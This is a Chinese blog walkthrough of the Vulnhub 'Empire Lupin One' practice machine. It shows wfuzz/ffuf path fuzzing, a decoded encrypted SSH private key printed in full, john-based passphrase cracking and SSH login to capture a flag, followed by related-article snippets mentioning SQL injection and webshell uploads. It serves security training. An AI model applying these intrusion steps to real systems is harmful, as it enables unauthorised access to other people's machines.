Empire Lupin One靶机攻略

于 2024-12-29 00:37:21 发布
阅读量356 收藏 10
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yiqiqukanrichu/article/details/144797691
版权

 

第一步信息收集

我们先扫描一下端口

扫描到开启了 22 端口 80 端口

我们使用御剑扫描一下网站的后台

我们挨个访问一下

发现 apache 的帮助页面,暂时记录,看看等会有没有需要

我们查看到 robots.txt 文档中有~myfiles 文档,这时我们猜测他会不会还有其他的文档带有~

我们使用 wfuzz 模糊查询来查找一下

wfuzz -u 'http://192.168.152.157/~FUZZ' -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404

注:--hc 404 是过滤404报错的

/usr/share/wfuzz/wordlist/general/common.txt是kali自带的字典

找到了一个 secret ,我们去访问一下

这时我们得到了一个 icex64,并且知道了这个目录下还有文件我们爆破一下

我们使用 ffuf 爆破

ffuf 常用于发现对应的文件,通过配置相应的密码本和规则模糊测试得出对应的文件名

/usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt

这个是 kali 自带的密码本

ffuf -u 'http://192.168.152.157/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200

爆破出了一个 mysecret.txt,我们去访问一下

访问不到,我们尝试在前面加个点试一试

文件里面全是编码过的数据,分析一下发现是 base58 编码,我们去解码

-----BEGIN OPENSSH PRIVATE KEY-----
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
iUJ66WmRUN9EoVlkeCzQJwivI=
-----END OPENSSH PRIVATE KEY-----

解码后得到了这个数据看起来像是 ssh 私钥

在 kali 中创建一个 ssh.txt 将得到的私钥复制进去

这时我们开始爆破 ssh 私钥

在使用ssh的私钥登录服务器时,需要输入密钥解开私钥才能进行登录.上述两步操作就是通过爆破私钥获取密钥方便后续登录.. 步骤如下
 
1 .获得ssh私钥密文
 
2 .使用kali自带的ssh2john程序生成私钥的对应密码本
/usr/share/john/ssh2john.py
 
3 .通过john程序爆破ssh私钥的对应密码本获取ssh私钥的密码
 
4 .通过私钥和对应密码登录账户

我们去 kali 中生成密码本

/usr/share/john/ssh2john.py ssh.txt > passwd.txt

生成密码本

john程序爆破获取私钥对应密码

前文访问~secret目录时知道密码用fasttrack进行加密,所以我们用kali的fasttrack.txt进行解密

john --wordlist=/usr/share/wordlists/fasttrack.txt passwd.txt

展示破解后的密码

john --show passwd.txt

现在利用已经得到的信息进行登录

ssh icex64@192.168.152.157 -i ssh.txt

显示没有权限,我们给这个文件提权

chmod 600 ssh.txt

我们再次登录

登录成功

我们输入 ls 查看它目录中有什么文件

我们 cat 查看一下 user.txt

得到了他的 flag 为 3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}

Vulnhub empire-lupinone靶机攻击实战(一)
初学者
02-11 851
  下载压缩包之后,会看到如下的内容,我们可以在VMware中通过.ovf文件进行虚拟机的导入。   导入完成如下所示,这样就算虚拟机启动了。   搭建好项目之后,接下来就是对漏洞信息进行扫描了,如下所示。   找到靶机地址192.168.1.102,接下来就是对靶机地址进行扫描   结果如下所示。   尝试访问一下80端口,结果如下所示,没有任何有价值的东西。   接下来我们扫描一下这个服务的其他隐藏路径。   结果如下所示   我们尝试访问一下/robots.txt   尝试访问一下/~myf
JIS-CTF:VulnUpload实战靶机搭建及玩耍攻略
星|Donstpast
04-03 1988
最近玩了一把子vulnhub的volnupload靶机,需要完整找出五个flag,我格局小,只是为了得到flag,所以,本文或许基础知识不会很多。主要是想体验那种实战夺旗的feel。另外也相当预自己的一个笔记吧。 该靶机下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/ 注:vulnhub中有很多优秀的实战靶机,自己可以下载下来去玩...
Hackme 靶机(通关攻略)
m0_68706634的博客
12-20 569
点击开启靶机去kali终端输入扫出靶机IP192.168.131.170。
XXE靶机攻略
l258282的博客
12-18 345
超详细步骤
hackme靶机攻略
qq_68186313的博客
07-29 713
12选择superadmin对应的密码2386acb2cf356944177746fc92523983并解密。8、已经判断完数据库查询表有3列,那么联合查询3列,查出数据库名。10、联合查询通过内置库查询当前数据库使用的表中的列。2、打开御剑,扫描端口,得到hackme靶机IP。9、联合查询通过内置库查询当前数据库使用的表。5、 到这一步发现可以进行sql注入。7、判断数据库当前查询表有几列。11、查询表中我们需要的数据。15、连接木马并进行系统控制。14、上传一句话木马。
upload-labs靶机及过关攻略(一)
木尤的博客
07-06 1708
upload-labs靶机及过关攻略(一) 注:由于笔者水平有限,暂时只记录前十二关的攻略 靶机环境:upload-labs 靶场地址:http://59.53.63.23:10772/Pass-02/index.php 靶场到期时间:2020.10.1 shell.php文件内容: <?php phpinfo(); ?> 怎么判断上传类型 第一关: 根据此关源码可知是用过js来设置文件上传白名单,只需要禁用浏览器的js即可轻松过关 第二关: 此关是通过限制文件上传类型来设置上传白名单,用
empire_one:亮度迭代一的代码
06-08
【标题】"empire_one:亮度迭代一的代码" 指向的可能是一个JavaScript项目,专注于实现一种图像处理技术,即亮度迭代。在图像处理领域,亮度迭代通常用于调整图像的明暗程度,使图像的亮部和暗部更加分明,或者改善...
Empire_one项目亮度迭代代码解析
根据给出的信息,本篇将深入探讨与标题“empire_one:亮度迭代一的代码”相关的知识点,同时结合描述和标签“JavaScript”以及提供的“empire_one-master”文件名,将聚焦于JavaScript编程语言在处理亮度迭代相关功能...
empire框架2022最新版本
06-28
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。 Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在...
Empire学习笔记.pdf
09-25
Empire是一款强大的、开源的 PowerShell 后渗透测试框架,由 Python 编写,主要用于网络攻防演练、红蓝对抗等安全场景。它允许安全研究人员在Windows、Linux和Mac OS平台上创建自定义的 PowerShell 模块,进行隐蔽的...
靶机攻略| Me-and-My-Girlfriend |
niext的博客
10-23 1676
1.靶机下载:https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova 2.靶机介绍 难度:✯✯✯ 目标:拿到两个flag 3.启动虚拟机 3.1信息搜集 主机发现 使用arp-scan扫描出3个ip地址: 第一个是我的VM8网卡,第三个是我设置的网关,如此确定第二个是目标IP。并且我查看了靶机的MAC地址与扫描出来的一致。 端口扫描 使用nmap扫描发现:22,80.
HTB靶机攻略onetwoseven
蚁景网安学院
10-23 484
最近HTB上新出来了一个靶场OneTwoSeven,所以我对它进行了测试,发现整个思路挺有意思,所以记录下来。信息搜集MASSCAN像往常一样,我们先masscan扫描然后再用nmap。...
Vulnhub靶机Wakanda渗透测试攻略
大方子
11-18 4792
百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导入Wakanda_1.ova靶机环境,修改其网络连接方式为Bridged(桥接网卡),并选择一个可用于联网的网卡(例如,我使用的无线网卡上网,在图中网卡为Inter(R) Dual Band Wireless-...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8708
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
百度坐标系、火星坐标系与WGS84坐标系互转方法
05-30
在IT领域,尤其是地理信息系统(GIS)中,坐标转换是一项关键技术。本文将深入探讨百度坐标系、火星坐标系和WGS84坐标系之间的相互转换,并介绍如何使用相关工具进行批量转换。 首先,我们需要了解这三种坐标系的基本概念。WGS84坐标系,即“World Geodetic System 1984”,是一种全球通用的地球坐标系统,广泛应用于GPS定位和地图服务。它以地球椭球模型为基础,以地球质心为原点,是国际航空和航海的主要参考坐标系。百度坐标系(BD-09)是百度地图使用的坐标系。为了保护隐私和安全,百度对WGS84坐标进行了偏移处理,导致其与WGS84坐标存在差异。火星坐标系(GCJ-02)是中国国家测绘局采用的坐标系,同样对WGS84坐标进行了加密处理,以防止未经授权的精确位置获取。 坐标转换的目的是确保不同坐标系下的地理位置数据能够准确对应。在GIS应用中,通常通过特定的算法实现转换,如双线性内插法或四参数转换法。一些“坐标转换小工具”可以批量转换百度坐标、火星坐标与WGS84坐标。这些工具可能包含样本文件(如org_xy_格式参考.csv),用于提供原始坐标数据,其中包含需要转换的经纬度信息。此外,工具通常会附带使用指南(如重要说明用前必读.txt和readme.txt),说明输入数据格式、转换步骤及可能的精度问题等。x86和x64目录则可能包含适用于32位和64位操作系统的软件或库文件。 在使用这些工具时,用户需要注意以下几点:确保输入的坐标数据准确无误,包括经纬度顺序和浮点数精度;按照工具要求正确组织数据,遵循读写规则;注意转换精度,不同的转换方法可能会产生微小误差;在批量转换时,检查每个坐标是否成功转换,避免个别错误数据影响整体结果。 坐标转换是GIS领域的基础操作,对于地图服务、导航系统和地理数据分析等至关重要。理解不同坐标系的特点和转换方法,有助于我们更好地处
基于PCI Express的FPGA加速器可重用集成框架RIFFA及其应用
05-30
内容概要:本文介绍了RIFFA(FPGA加速器可重用集成框架),这是一个通过PCI Express总线将数据从主机CPU传输到FPGA的简单框架。RIFFA支持多种操作系统(Windows和Linux)、FPGA品牌(Altera和Xilinx)以及编程语言(C/C++、Python、MATLAB和Java)。它提供了高效的DMA传输和中断信号传输机制,确保数据传输的高速和可靠性。硬件方面,RIFFA采用独立的发送和接收信号接口,通过FIFO接口实现事务握手。软件方面,用户可以通过简单的API调用与FPGA IP核进行通信。RIFFA支持多达5个FPGA设备,适用于大数据和计算密集型应用场景。 适合人群:对FPGA加速器感兴趣的硬件工程师、嵌入式系统开发者、从事高性能计算的研究人员和技术爱好者。 使用场景及目标:① 需要在主机CPU和FPGA之间高效传输大量数据的应用;② 希望简化FPGA编程和配置流程的研发团队;③ 需要跨平台支持(Windows和Linux)的项目。 其他说明:RIFFA已经在多个开发板上成功实现,并提供了详细的示例和指南,帮助用户快速上手。
增程式混合动力汽车建模仿真及整车策略开发详解 · 建模与仿真
最新发布
05-30
内容概要:本文详细介绍了增程式混合动力汽车的建模与仿真模型搭建,涵盖增程器、电机、电池、驾驶员模型及整车VCU控制模型。首先,文章解释了各个关键组件的工作原理和性能参数,接着描述了模型搭建的具体步骤,包括数据收集、各部件模型的建立、驾驶员模型和VCU控制模型的整合,最后通过仿真验证与优化来确保模型的有效性和准确性。此外,还探讨了基于模型的整车策略开发思路,如能量管理策略、纯电模式到增程模式的切换策略以及电量维持规则阈值参数设定。 适合人群:从事新能源汽车研发的技术人员、高校相关专业师生、汽车行业研究人员。 使用场景及目标:适用于新能源汽车尤其是增程式混合动力汽车的研发过程中,帮助相关人员掌握建模方法和技术细节,提高整车性能和效率。 其他说明:本文不仅提供了理论指导,还附有详细的实践步骤,有助于理解和应用增程式混合动力汽车的建模与仿真技术。
TypeError Event name already declared - 事件名称重复声明(解决办法).md
05-30
TypeError Event name already declared - 事件名称重复声明(解决办法).md
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值